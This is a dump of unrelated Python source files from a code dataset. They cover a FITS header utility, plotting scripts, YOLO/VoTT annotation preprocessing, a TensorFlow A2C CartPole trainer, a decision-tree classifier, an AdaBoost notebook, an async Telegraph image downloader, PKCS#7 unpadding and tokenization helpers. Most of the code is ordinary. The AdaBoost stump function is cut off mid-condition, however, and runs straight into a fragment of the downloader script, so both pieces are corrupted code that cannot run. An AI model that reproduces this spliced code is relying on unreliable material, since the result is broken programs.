AddHeaderComment (fitsfile, commentlist, outfilename=None)\n            \"fitsfile\" is the FITS file name.\n            \"commentlist\" is a list with the comments to add.\n            \"outfilename\" optional filename for output. Else the input file is overwritten.\n            \n            Function returns two values: (res, code). If res is False code reports the problem \n            (codes are in SRPFITS.FitsConstants). Else res is True.\n\nRemarks :\n\nHistory : (01/10/2010) First version.\n        : (25/04/2011) Input and output file names can be different.\n        : (27/04/2011) Always list in output.\n        : (21/07/2014) Better management of non-standard FITS headers.\n        : (31/07/2015) python3 porting.\n        : (18/05/2017) astropy.io.fits\n\"\"\"\n\nimport warnings\n\nfrom astropy.io import fits\nfrom . 
import FitsConstants\n\ndef AddHeaderComment (fitsfile, commentlist, outfilename=None):\n    try:\n        hdr = fits.open(fitsfile)\n    except IOError:\n        return False,FitsConstants.FitsFileNotFound\n    header = hdr[0].header\n    for i in commentlist:\n        header.add_comment(i)\n    #\n    warnings.resetwarnings()\n    warnings.filterwarnings('ignore', category=UserWarning, append=True)\n    warnings.filterwarnings('ignore', category=ResourceWarning, append=True)\n    if outfilename is None:\n        hdr.writeto(fitsfile,overwrite=True,output_verify='ignore')\n    else:\n        hdr.writeto(outfilename,overwrite=True,output_verify='ignore')\n    warnings.resetwarnings() \n    warnings.filterwarnings('always', category=UserWarning, append=True)\n    warnings.filterwarnings('always', category=ResourceWarning, append=True)\n    hdr.close()\n    return True,FitsConstants.FitsOk\n","sub_path":"python3/SRPAstro/SRP.FITS/SRPFITS/Fits/AddHeaderComment.py","file_name":"AddHeaderComment.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216739587","text":"#-*- coding:utf-8 -*-\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#you can write your code here\r\ndef draw():\r\n    #get input data\r\n    menMeans = (20, 35, 30, 35, 27)\r\n    menStd = (2, 3, 4, 1, 2)\r\n    womenMeans = (25, 32, 34, 20, 25)\r\n    womenStd = (3, 5, 2, 3, 3)\r\n\r\n    ind = np.arange(5)\r\n    width = 0.35\r\n    # grouped bar chart of the data\r\n    plt.bar(ind, menMeans, width, color='r')\r\n    plt.bar(ind+width, womenMeans, width, color='y')\r\n    #show image\r\n    plt.savefig('fig.png')\r\n\r\n#the code should not be changed\r\nif __name__ == '__main__':\r\n    draw()","sub_path":"examination/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567470724","text":"import numpy as np\nimport pandas as pd\nimport cv2\nimport os\n\n\nimgFormatList = [\"jpg\", \"jpeg\", \"png\"]\n\ndef getFilenameWoExt(Filename):\n    return \".\".join(Filename.split('.')[:-1])\n\ndef getExt(Filename):\n    return Filename.split('.')[-1].lower()\n\ndef getCSVName(dirPath):\n    if dirPath[-1] == '/':\n        return dirPath[:-1] + \".csv\"\n    else:\n        return dirPath + \".csv\"\n\ndef getBrand(dirPath):\n    return dirPath[:-1].split('/')[-1]\n\ndef optimizeFolder(dirPath, etcPath, flag):\n    \"\"\"\n    flag = 0 means labelImg Program\n    flag = 1 means VoTT Program\n    \"\"\"\n    if not os.path.isdir(etcPath):\n        os.mkdir(etcPath)\n\n    count = 0\n    imgFilenameList = []\n    txtFilenameList = []\n    etcFilenameList = []\n\n    if flag == 0: # labelImg\n        # delete files that have no matching text file\n        FilenamesList = os.listdir(dirPath)\n        \n        for Filename in FilenamesList:\n            ext = getExt(Filename)\n\n            if ext == \"txt\":\n                txtFilenameList.append(getFilenameWoExt(Filename))\n            else:\n                etcFilenameList.append(Filename)\n\n        for etcFilename in etcFilenameList:\n            if getFilenameWoExt(etcFilename) not in txtFilenameList:\n                os.replace(dirPath + etcFilename, etcPath + etcFilename)\n                count += 1\n\n        txtFilenameList.clear()\n        etcFilenameList.clear()\n\n        # delete files that have no matching image file\n        FilenamesList = os.listdir(dirPath)\n\n        for Filename in FilenamesList:\n            ext = getExt(Filename)\n\n            if ext in imgFormatList:\n                imgFilenameList.append(getFilenameWoExt(Filename))\n            else:\n                etcFilenameList.append(Filename)\n\n        for etcFilename in etcFilenameList:\n            if getFilenameWoExt(etcFilename) not in imgFilenameList:\n                os.replace(dirPath + etcFilename, etcPath + etcFilename)\n                count += 1\n\n        imgFilenameList.clear()\n        etcFilenameList.clear()\n    elif flag == 1: # VoTT\n        # delete images that have no matching entry in the csv file\n        csvFileName = getCSVName(dirPath)\n        df = pd.read_csv(csvFileName)\n        \n        FilenamesList = os.listdir(dirPath)\n\n        for Filename in FilenamesList:\n            if Filename not in df[['image']].values:\n                os.replace(dirPath + Filename, etcPath + Filename)\n                count += 1\n\n        # delete csv rows that have no matching image file\n        FilenamesList = os.listdir(dirPath)\n        \n        etcDf = pd.DataFrame(columns=df.columns)\n\n        for imgName in df[['image']].values:\n            imgName = imgName[0]\n            \n            if imgName not in FilenamesList:\n                etcDf = etcDf.append(df[df.image == imgName])\n                df = df[df.image != imgName]\n                count += 1\n\n        df.to_csv(csvFileName, index=False)\n        etcDf.to_csv(etcPath + getCSVName(getBrand(dirPath)), index=False)\n    else:\n        raise Exception(\"Not supported flag Exception\")\n\n    print(\"deleted {} file(s)\".format(count))\n\ndef labelImgYOLO2VoTTCSV(dirPath, etcPath, label):\n    FilenameList = os.listdir(dirPath)\n    csvFileName = getCSVName(dirPath)\n    imgFilenameList = []\n    imgname = None\n\n    with open(csvFileName, 'w', errors='ignore') as out:\n        out.write('\"image\",\"xmin\",\"ymin\",\"xmax\",\"ymax\",\"label\"\\n')\n\n        for Filename in FilenameList:\n            if getExt(Filename) in imgFormatList:\n                imgFilenameList.append(Filename)\n\n        for imgFilename in imgFilenameList:\n            txtFilename = getFilenameWoExt(imgFilename) + \".txt\"\n            img = cv2.imread(dirPath + imgFilename)\n            try:\n                img_y, img_x = img.shape[:2]\n            except AttributeError as e:\n                os.replace(dirPath + imgFilename, etcPath + imgFilename)\n                os.replace(dirPath + txtFilename, etcPath + txtFilename)\n                continue\n\n            # with open(dirPath + txtFilename, 'r', errors='ignore') as textfile:\n            with open(dirPath + txtFilename, 'r') as textfile:\n                lines = textfile.readlines()\n                for line in lines:\n                    x, y, w, h = line.split()[1:]\n                    x = float(x)\n                    y = float(y)\n                    w = float(w)\n                    h = float(h)\n                    out.write('\"{}\",{},{},{},{},{}\\n'.format(imgFilename, x * img_x - (w * img_x / 2), y * img_y - (h * img_y / 2), x * img_x + (w * img_x / 2), y * img_y + (h * img_y / 2), label))\n\ndef csvFloat2Int(dirPath):\n    csvFileName = getCSVName(dirPath)\n    df = pd.read_csv(csvFileName)\n    df[['xmin', 'ymin', 'xmax', 'ymax', 'label']] = df[['xmin', 'ymin', 'xmax', 'ymax', 'label']].astype('uint16')\n    df.to_csv(csvFileName, index = False)\n\ndef saveCroppedImg(dirPath, outPath):\n    \"\"\"\n    'dirPath' is the image folder path\n    \"\"\"\n    brand = getBrand(dirPath)\n    csvFileName = getCSVName(dirPath)\n    df = pd.read_csv(csvFileName)\n    \n    if not os.path.isdir(outPath):\n        os.mkdir(outPath)\n    \n    for i in range(len(df)):\n        sr = df.iloc[i]\n        filePath = dirPath + sr['image']\n        img = cv2.imread(filePath)\n\n        if img is not None:\n            croppedimg = img[sr['ymin']:sr['ymax'], sr['xmin']:sr['xmax']]\n            cv2.imwrite(\"{}{}_{}_{}.png\".format(outPath, sr['label'], brand, i,), croppedimg)\n            # cv2.rectangle(img, (sr['xmin'], sr['ymin']), (sr['xmax'], sr['ymax']), (0, 0, 255))\n            # cv2.imshow(\"img\", img)\n            # cv2.waitKey()\n            # cv2.destroyAllWindows()\n        else:\n            print(\"****************************************\")\n            print(\"*\", filePath, \"is None\")\n            print(sr)\n            print(\"****************************************\")\n\n        if i % 100 == 0 and i != 0:\n            print(\"{} / {} = {}%\".format(i, len(df), int(i / len(df) * 10000) / 100))\n\n    print()\n\ndef voTTCSV2YOLOAnnoTxt(imgPath, csvFileList):\n    outList = []\n\n    for csvFile in csvFileList:\n        prvImgName = None\n\n        with open(imgPath + csvFile) as csvFileName:\n            lines = csvFileName.readlines()\n            lines = lines[1:] # remove the column header row\n\n            for line in lines:\n                splitted = 
line.split(',')\n splitted[-1] = splitted[-1].replace('\"', '') # remove double quote\n splitted[-1] = splitted[-1].replace('\\n', '') # delete newline\n splitted[1:] = list(map(float, splitted[1:])) # string to float\n splitted[1:] = list(map(int, splitted[1:])) # float to int\n splitted[1:] = list(map(str, splitted[1:])) # int to str\n\n if prvImgName != splitted[0]:\n splitted[1] = imgPath + csvFile[:-4] + \"/\" + splitted[0].replace('\"', '') # remove double quote\n splitted[1] = \" \".join(splitted[1:3]) # concat\n splitted[1] = \",\".join(splitted[1:]) # concat\n outList.append(splitted[1])\n else:\n outList[-1] = outList[-1] + \" \" + \",\".join(splitted[1:]) # concat\n\n prvImgName = splitted[0]\n\n with open(\"./train.txt\", 'w') as outfile:\n for line in outList:\n outfile.write(line + '\\n')\n\nimport os\nimport numpy as np\nimport cv2\nimport pandas as pd\n\ndef define(path, imgCount):\n img = os.listdir(path)\n \n c=[]\n tmpClass = []\n cls = []\n \n for i in range(len(img)):\n tmpClass.append(int(img[i][0]))\n \n for i in range(10):\n for j in range(tmpClass.index(i), tmpClass.index(i) + imgCount):\n b= cv2.imread(path + '{}'.format(img[j]))\n b = cv2.resize(b, dsize = (50, 50))\n b = b / 255\n c.append(b)\n cls.append(i)\n \n img = pd.DataFrame(cls, columns = ['class'])\n \n return c, img\n","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":7903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"266844899","text":"import scipy.signal\nimport time\nfrom tensorflow.contrib import layers\nimport tensorflow as tf\nimport gym\nimport yaml\n\nimport numpy as np\n\nfrom collections import namedtuple\nfrom collections import deque\n\nCONFIG = 'config_pg.yaml'\nVERBOSE = True\n\ndef _feed_forward(states, hiddens, output, activation=tf.tanh, activation_output=None):\n last_layer = states\n for hidden in hiddens:\n last_layer = layers.fully_connected(last_layer, hidden, activation_fn=activation)\n return layers.fully_connected(last_layer, output, activation_fn=activation_output)\n\nclass Model:\n\n def __init__(self, session, num_actions, config, scope, summaries_dir=None):\n self.session = session\n self.num_actions = num_actions\n self.config = config\n self.scope = scope\n self.summary_writer = None\n with tf.variable_scope(scope):\n self.states = tf.placeholder(tf.float32, shape=(None, 4))\n self.actions = tf.placeholder(tf.int32, shape=(None,))\n self.weights = tf.placeholder(tf.float32, shape=(None,))\n self.returns = tf.placeholder(tf.float32, shape=(None,))\n self.learning_rate = tf.placeholder_with_default(self.config['learning_rate'], shape=())\n\n self._build_network()\n\n def train(self, observations, actions, weights, returns):\n loss, _ = self.session.run(\n [self.loss, self.train_op],\n feed_dict={\n self.states: observations,\n self.actions: actions,\n self.weights: weights,\n self.returns: returns,\n })\n return loss\n\n def predict(self, observation):\n predictions, values = self.session.run(\n [self.predictions, self.values],\n feed_dict={\n self.states: observation,\n })\n return predictions, values\n\n def cleanup(self):\n pass\n\n def _minimize(self, optimizer):\n params = tf.trainable_variables(self.scope)\n gradients = tf.gradients(self.loss, params)\n self.gradients_norm = tf.global_norm(gradients)\n if self.config['clip_by_norm']:\n gradients, self.gradients_norm = tf.clip_by_global_norm(\n gradients, self.config['clip_by_norm'])\n gradients = 
list(zip(gradients, params))\n return optimizer.apply_gradients(gradients)\n\n def _build_network(self):\n logits = _feed_forward(self.states, [32], self.num_actions)\n self.predictions = tf.squeeze(tf.multinomial(logits=logits, num_samples=1), axis=1)\n\n action_masks = tf.one_hot(self.actions, self.num_actions)\n log_prob_v = tf.nn.log_softmax(logits)\n log_probs = tf.reduce_sum(action_masks * log_prob_v, axis=1)\n policy_loss = -tf.reduce_mean(self.weights * log_probs)\n\n self.values = _feed_forward(self.states, [32], 1)\n value_loss = tf.reduce_mean(tf.square(self.values - self.returns))\n self.loss = policy_loss + value_loss\n optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate, epsilon=1e-3)\n self.train_op = self._minimize(optimizer)\n\n return\n\n\nclass Agent():\n\n def __init__(self, num_actions, config):\n self.num_actions = num_actions\n self.config = config\n\n tf.reset_default_graph()\n self.session = tf.Session()\n self.model = Model(self.session, num_actions, self.config, 'Model', self._get_summary_dir())\n self.session.run(tf.global_variables_initializer())\n return\n\n def choose_action(self, observation):\n predictions, _ = self.model.predict(np.array(observation, copy=False).reshape(1, -1))\n return predictions[0]\n\n def get_value(self, observation):\n _, values = self.model.predict(np.array(observation, copy=False).reshape(1, -1))\n return values[0][0]\n\n def train(self, observations, actions, weights, returns):\n loss = self.model.train(observations, actions, weights, returns)\n return loss\n\n def cleanup(self):\n self.model.cleanup()\n self.session.close()\n pass\n\n def _get_summary_dir(self):\n return None\n\n\ndef reward_to_go(x, gamma=1.):\n return scipy.signal.lfilter([1], [1, float(-gamma)], x[::-1], axis=0)[::-1]\n\n\nExperience = namedtuple('Experience',\n ('observation',\n 'action',\n 'reward_to_go',\n 'new_observation',\n 'episode_return',\n 'episode_length'))\n\n\ndef iterative_environment(env, agent, config):\n experience_length = config['experience_length']\n observations = deque(maxlen=experience_length)\n actions = deque(maxlen=experience_length)\n episode_rewards = []\n\n observation = env.reset()\n while True:\n action = agent.choose_action(observation)\n new_observation, reward, done, _ = env.step(action)\n observations.append(observation)\n observation = new_observation\n actions.append(action)\n episode_rewards.append(reward)\n\n weights = list(reward_to_go(episode_rewards[-experience_length:], config['gamma']))\n if done:\n for idx, weight in enumerate(weights):\n yield Experience(\n observations.popleft(),\n actions.popleft(),\n weight,\n None,\n sum(episode_rewards) if idx + 1 == len(weights) else None,\n len(episode_rewards))\n observations.clear()\n actions.clear()\n episode_rewards.clear()\n observation = env.reset()\n elif len(observations) == experience_length:\n yield Experience(observations[0], actions[0], weights[0], observation, None, None)\n return\n\ndef play_one_epoch_continuous_vectorized(iterative_vectorized_env, agent, config):\n experience_length = config['experience_length']\n gamma_multiplier = config['gamma']**experience_length\n\n observations = []\n actions = []\n weights = []\n returns = []\n episode_returns = []\n episode_lengths = []\n\n done = False\n while not done:\n for iterative_env in iterative_vectorized_env:\n experience = next(iterative_env)\n observations.append(experience.observation)\n actions.append(experience.action)\n observation_value = agent.get_value(experience.observation)\n 
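# n-step bootstrap: if the episode continued past the experience window,\n            # extend the reward-to-go with the discounted critic value (gamma_multiplier)\n            # of the state reached after the window; terminated episodes need no bootstrap.\n            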
new_observation = experience.new_observation\n if new_observation is not None:\n new_observation_value = agent.get_value(new_observation)\n returns.append(experience.reward_to_go + gamma_multiplier * new_observation_value)\n else:\n returns.append(experience.reward_to_go)\n weights.append(returns[-1] - observation_value)\n if experience.episode_return is not None:\n episode_returns.append(experience.episode_return)\n episode_lengths.append(experience.episode_length)\n if len(observations) == config['epoch_length']:\n done = True\n break\n\n weights = np.array(weights)\n weights -= np.mean(weights)\n weights/= np.std(weights)\n loss = agent.train(observations, actions, weights, returns)\n return loss, episode_returns, episode_lengths\n\n\ndef play_continuous_vectorized(vectorized_env, agent, config):\n start_time = time.time()\n iterative_vectorized_env = [iterative_environment(\n env, agent, config) for env in vectorized_env]\n for epoch in range(config['epochs']):\n loss, episode_returns, episode_lengths = play_one_epoch_continuous_vectorized(\n iterative_vectorized_env, agent, config)\n print('Epoch: {:3d}, loss: {:.3f}, returns: {:.3f}, lengths: {:.3f}'.format(\n epoch, loss, np.mean(episode_returns), np.mean(episode_lengths)))\n print('Finished in {} seconds'.format(time.time() - start_time))\n\n\ndef main():\n with open(CONFIG) as reader:\n config = yaml.safe_load(reader)\n\n vectorized_env = [gym.make(config['environment']) for _ in range(config['num_env'])]\n num_actions = vectorized_env[0].action_space.n\n\n agent = Agent(num_actions, config)\n play_continuous_vectorized(vectorized_env, agent, config)\n agent.cleanup()\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"PG_experiments/main_a2c_vectorized_cartpole.py","file_name":"main_a2c_vectorized_cartpole.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"589102463","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 27 11:13:28 2018\n\n@author: dlf43\n\"\"\"\n\nimport csv\nfrom sklearn.tree import DecisionTreeClassifier\n\n\ndata_file = {\n 'train': 'train.csv',\n 'test': 'test.csv',\n 'result': 'test_prediction.csv',\n }\n\n\ndef load_data(file: str, train=True):\n if train:\n train_info, wine_category = [], []\n with open(file) as csvfile:\n data = csv.reader(csvfile)\n for row in data:\n train_info.append(row[1:-1])\n wine_category.append(row[-1])\n \n train_info = train_info[1:]\n wine_category = wine_category[1:]\n for i in range(3500):\n for j in range(12):\n train_info[i][j] = float(train_info[i][j])\n wine_category[i] = int(wine_category[i])\n return train_info, wine_category\n else:\n wine_id, test_info = [], []\n with open(file) as csvfile:\n data = csv.reader(csvfile)\n for row in data:\n wine_id.append(row[0])\n test_info.append(row[1:-1])\n \n wine_id = wine_id[1:]\n test_info = test_info[1:]\n for i in range(1500):\n for j in range(12):\n test_info[i][j] = float(test_info[i][j])\n wine_id[i] = int(wine_id[i])\n return wine_id, test_info\n \n\ndef func():\n # Train the Classifier\n clf = DecisionTreeClassifier(criterion=\"gini\")\n train_info, train_category = load_data(data_file['train'])\n clf.fit(train_info, train_category)\n \n # Predict the Wine\n wine_id, test_info = load_data(data_file['test'], train=False)\n result = clf.predict(test_info)\n \n # Show result\n pairs = []\n for ii in zip(wine_id, result):\n pairs.append(ii)\n pairs.sort()\n \n with open(data_file['result'], 'w') as 
csvfile:\n        csvfile.write('%s,%s\\n' % ('id', 'type'))\n        for p in pairs:\n            csvfile.write('%d,%d\\n' % (p[0], p[1]))\n    return\n\n\nif __name__ == \"__main__\":\n    func()\n    ","sub_path":"Data_Analysis/红酒分类/红酒分类.py","file_name":"红酒分类.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81378210","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Implementation of the **AdaBoost** algorithm based on *Decision Stumps*. \n# \n# ### See chapter 10 of the book *Understanding Machine Learning* by S. Shalev-Shwartz and S. Ben-David\n\n# In[89]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nget_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'retina'\")\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport progressbar\nimport seaborn as sns\n\nsns.set()\n\n\n# In[90]:\n\n\nclass Stump:\n    def __init__(self,j,theta,b):\n        self.j=int(j)\n        self.theta=theta\n        self.b=b\n    def __call__(self,x):\n        return np.transpose([self.b*np.sign(self.theta-x[:,self.j])])\n    def erreur(self,x,y,D):\n        return np.sum(D*(y!=self(x)))\n\n\n# In[91]:\n\n\nclass Hypotheses:\n    def __init__(self):\n        self.weights=[]\n        self.stumps=[]\n        self.D=[]\n    def add_weight(self,w):\n        self.weights.append(w)\n    def add_stump(self,h):\n        self.stumps.append(h)\n    def add_D(self,D):\n        self.D.append(D)\n    def __call__(self,x):\n        T=len(self.weights)\n        s=0\n        for t in range(T):\n            s+=self.weights[t]*self.stumps[t](x)\n        return np.sign(s)\n    def erreur(self,x,y):\n        m=len(y)\n        return sum(self(x)!=y)/m\n\n\n# The following function solves the Empirical Risk Minimization problem for the class of Decision Stumps: it computes \n# \n# $${\\rm argmin}_{h\\in {\\rm Stump}}\\sum_{i=1}^mD_i \\mathbb 1(h(x_i)\\neq y_i)$$\n\n# In[92]:\n\n\nx = np.array([[0.9421374 , 0.19022691],\n       [0.52865533, 0.96814701],\n       [0.76081068, 0.74943315],\n       [0.72926312, 0.95525445],\n       [0.9139678 , 0.4397556 ],\n       [0.18559422, 0.22103276],\n       [0.92784066, 0.99142989],\n       [0.98574519, 0.29678577],\n       [0.05191972, 0.59002284],\n       [0.88070615, 0.72356571]])\nx\n\n\n# In[93]:\n\n\nm = 10\nindice_tri=np.argsort(x,axis=0)\nxsort=x[indice_tri[:,0]][:,0]\nxsort=np.concatenate((xsort,[xsort[m-1]+1]))\nxsort\n\n\n# In[94]:\n\n\ndef ERM_Stump(x,y,D):\n    size=np.shape(x)\n    m=size[0]\n    d=size[1]\n    Fstar=1.e16\n    bstar=1\n    indice_tri=np.argsort(x,axis=0)\n    for j in range(d):\n        xsort=x[indice_tri[:,j]][:,j]\n        xsort=np.concatenate((xsort,[xsort[m-1]+1]))\n        ysort=y[indice_tri[:,j]]\n        Dsort=D[indice_tri[:,j]]\n        F=np.sum(Dsort*(ysort+1)/2)\n        if F|]', '-', title)\n        url_list = []\n        images = soup.findAll(\"img\")\n        for img in images:\n            url_list.append('https://telegra.ph' + img['src'])\n        return (title, url_list)\n    else:\n        logging.error('Request failed with status code %s' % response.status_code)\n\n\nasync def main(pool, url, path):  # entry point\n    sem = asyncio.Semaphore(pool)\n    worker = get_img_links(url)\n    dirname = worker[0]\n    links = worker[1]\n    file_path = os.path.join(path, dirname)\n    if not os.path.exists(file_path):\n        os.mkdir(file_path)\n    async with aiohttp.ClientSession() as session:  # share a single session across all requests\n        tasks = []\n        for link in links:\n            tasks.append(control_sem(sem, link, session, file_path))\n        tasks_iter = asyncio.as_completed(tasks)\n        # create a progress bar\n        fk_task_iter = tqdm(tasks_iter, total=len(links), unit='files')\n        for coroutine in fk_task_iter:\n            # collect the result\n            await coroutine\n\n\nasync def control_sem(sem, url, session, path):  # bound concurrency with the semaphore\n    async with sem:\n        await fetch(url, session, path)\n\n\nasync def fetch(url, session, path):  # issue the asynchronous request\n    src_name = url.split('/')[-1]\n    async with session.get(url, timeout=60) as resp:  # set a timeout\n        with open(os.path.join(path, src_name), 'wb') as fd:\n            while True:\n                chunk = await resp.content.read(1024)  # read 1024 bytes at a time\n                if not chunk:\n                    break\n                fd.write(chunk)\n\n\nurl = ''\npath = \"E:\\\\ChromeDownloads\\\\图片助手(ImageAssistant) 批量图片下载器\"\npool_num = 5\nstart = time.time()\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main(pool=pool_num, url=url, path=path))\nend = time.time()\nlogging.info(f'Total download time: {end - start}')\n","sub_path":"telegraph/aiohttp_download_image.py","file_name":"aiohttp_download_image.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"420636068","text":"import binascii\n\n ## @param text The padded text for which the padding is to be removed.\n # @exception ValueError Raised when the input padding is missing or corrupt.\ndef decode(text):\n    '''\n    Remove the PKCS#7 padding from a text string\n    '''\n    nl = len(text)\n    val = int(binascii.hexlify(text[-1]), 16)\n    if val > 16:\n        raise ValueError('Input is not padded or padding is corrupt')\n    l = nl - val\n    return text[:l]\n","sub_path":"server/pkcs7.py","file_name":"pkcs7.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397735346","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*- \n# Author: lionel\nimport collections\nimport tensorflow as tf\n\nimport six\nimport unicodedata\n\n\ndef convert_to_unicode(text):\n    \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n    if six.PY3:\n        if isinstance(text, str):\n            return text\n        elif isinstance(text, bytes):\n            return text.decode(\"utf-8\", \"ignore\")\n        else:\n            raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n    elif six.PY2:\n        if isinstance(text, str):\n            return text.decode(\"utf-8\", \"ignore\")\n        elif isinstance(text, unicode):\n            return text\n        else:\n            raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n    else:\n        raise ValueError(\"Not running on Python2 or Python 3?\")\n\n\ndef load_vocab(vocab_file):\n    \"\"\"Loads a vocabulary file (char) into a dictionary.\"\"\"\n    vocab = collections.OrderedDict()\n    index = 0\n    with tf.gfile.GFile(vocab_file, \"r\") as reader:\n        for line in reader:\n            token = convert_to_unicode(line)\n            if not token:\n                continue\n            token = token.strip()\n            vocab[token] = index\n            index += 1\n    return vocab\n\n\ndef load_vocab_ids(vocab_file):\n    \"\"\"Loads a vocabulary file ( char:id ) into a dictionary.\"\"\"\n    vocab = dict()\n    with tf.gfile.GFile(vocab_file, \"r\") as reader:\n        for line in reader:\n            token = convert_to_unicode(line)\n            fields = token.split(':')\n            if len(fields) != 2:\n                continue\n            if fields[0] is None:\n                continue\n            vocab[fields[0].strip()] = int(fields[1])\n    return vocab\n\n\ndef is_whitespace(char):\n    \"\"\"Checks whether `chars` is a whitespace character.\"\"\"\n    # \\t, \\n, and \\r are technically control characters but we treat them\n    # as whitespace since they are generally considered as such.\n    if char == \" \" or char == \"\\t\" or char == \"\\n\" or char == \"\\r\":\n        return True\n    cat = unicodedata.category(char)\n    if cat == \"Zs\":\n        return True\n    return False\n\n\ndef is_control(char):\n    \"\"\"Checks whether `chars` is a control character.\"\"\"\n    # These are technically control characters but we count them as whitespace\n    # characters.\n    if char == \"\\t\" or 
char == \"\\n\" or char == \"\\r\":\n return False\n cat = unicodedata.category(char)\n if cat.startswith(\"C\"):\n return True\n return False\n\n\ndef is_punctuation(char):\n \"\"\"Checks whether `chars` is a punctuation character.\"\"\"\n cp = ord(char)\n # We treat all non-letter/number ASCII as punctuation.\n # Characters such as \"^\", \"$\", and \"`\" are not in the Unicode\n # Punctuation class but we treat them as punctuation anyways, for\n # consistency.\n if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or\n (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):\n return True\n cat = unicodedata.category(char)\n if cat.startswith(\"P\"):\n return True\n return False\n\n\ndef features_labels_digitalize(examples, word_index, maxlen):\n text_a_ids = []\n text_b_ids = []\n label_ids = []\n for example in examples:\n ids_a = text_to_sequence(example.text_a, word_index)\n text_a_ids.append(ids_a)\n label_ids.append(convert_to_unicode(example.label))\n\n if example.text_b is None:\n continue\n ids_b = text_to_sequence(example.text_b, word_index)\n text_b_ids.append(ids_b)\n\n text_a_ids = tf.keras.preprocessing.sequence.pad_sequences(text_a_ids, value=word_index['pad'], padding='post',\n maxlen=maxlen)\n if len(text_b_ids) <= 0:\n text_b_ids = None\n else:\n text_b_ids = tf.keras.preprocessing.sequence.pad_sequences(text_b_ids, value=word_index['pad'],\n padding='post',\n maxlen=maxlen)\n label_ids = tf.keras.utils.to_categorical(label_ids, 2)\n return text_a_ids, text_b_ids, label_ids\n\n\ndef text_to_sequence(text, word_index):\n sequence = []\n for word in list(convert_to_unicode(text)):\n sequence.append(word_index.get(word, word_index.get('unk')))\n return sequence\n","sub_path":"data_utils/tokenization.py","file_name":"tokenization.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"632157607","text":"# coding=utf-8\nfrom pyecharts import Pie\nimport pandas as pd\n\npie = Pie(\"奥巴马政策对比\", title_pos=\"center\", width=1600, height=800)\nfile = pd.read_csv(\"presidential_approval_rate.csv\")\n# print(file['political_issue'])\nls_pos1 = [i for i in range(10, 71, 12)] * 2\nls_pos1.append(82)\nls_pos = [30] * 6 + [70] * 7\nfor i in range(len(file['support'])):\n pie.add(file['political_issue'][i], [\"support\", \"oppose\", \"no_opinion\"],\n [file['support'][i], file['oppose'][i], file['no_opinion'][i]],\n center=[ls_pos1[i], ls_pos[i]], radius=[15, 20], is_label_show=True,\n label_pos='center', legend_top='center', label_text_size=15)\npie.render('Pie3.html')\n","sub_path":"chap04/scale_data_keshihua3.py","file_name":"scale_data_keshihua3.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"169534558","text":"# Copyright (c) 2015-2019, Activision Publishing, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. 
Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"Assertion library for python unit testing with a fluent API\"\"\"\n\nfrom __future__ import print_function\nimport os\nimport contextlib\nimport inspect\nimport logging\nimport sys\nimport types\nfrom .base import BaseMixin\nfrom .contains import 